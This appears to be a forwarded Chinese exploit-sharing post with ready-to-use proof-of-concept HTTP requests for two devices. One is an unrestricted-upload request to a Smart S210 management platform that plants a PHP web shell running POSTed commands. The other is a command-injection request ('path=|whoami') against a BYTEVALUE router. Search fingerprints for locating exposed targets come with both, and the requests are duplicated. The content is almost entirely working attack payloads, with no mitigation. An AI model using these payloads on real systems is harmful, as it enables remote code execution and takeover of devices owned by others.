北京百绰智能S210管理平台uploadfile.php无限制上传漏洞
noscript="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1Host: 192.168.40.130:8443Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887Content-Length: 405Origin: https://192.168.40.130:8443Referer: https://192.168.40.130:8443/Tool/uploadfile.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: close-----------------------------13979701222747646634037182887Content-Disposition: form-data; name="file_upload"; filename="contents.php"Content-Type: application/octet-stream<?phpsystem($_POST["passwd"]);?>-----------------------------13979701222747646634037182887Content-Disposition: form-data; name="txt_path"/home/src.php-----------------------------13979701222747646634037182887--
路径:/home/src.php
noscript="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1Host: 192.168.40.130:8443Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887Content-Length: 405Origin: https://192.168.40.130:8443Referer: https://192.168.40.130:8443/Tool/uploadfile.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: close-----------------------------13979701222747646634037182887Content-Disposition: form-data; name="file_upload"; filename="contents.php"Content-Type: application/octet-stream<?phpsystem($_POST["passwd"]);?>-----------------------------13979701222747646634037182887Content-Disposition: form-data; name="txt_path"/home/src.php-----------------------------13979701222747646634037182887--
路径:/home/src.php
百为智能流控路由器RCE
noscript="BYTEVALUE 智能流控路由器"
GET /goform/webRead/open/?path=|whoami HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Upgrade-Insecure-Requests: 127
noscript="BYTEVALUE 智能流控路由器"
GET /goform/webRead/open/?path=|whoami HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Upgrade-Insecure-Requests: 127
Forwarded from Jack Black
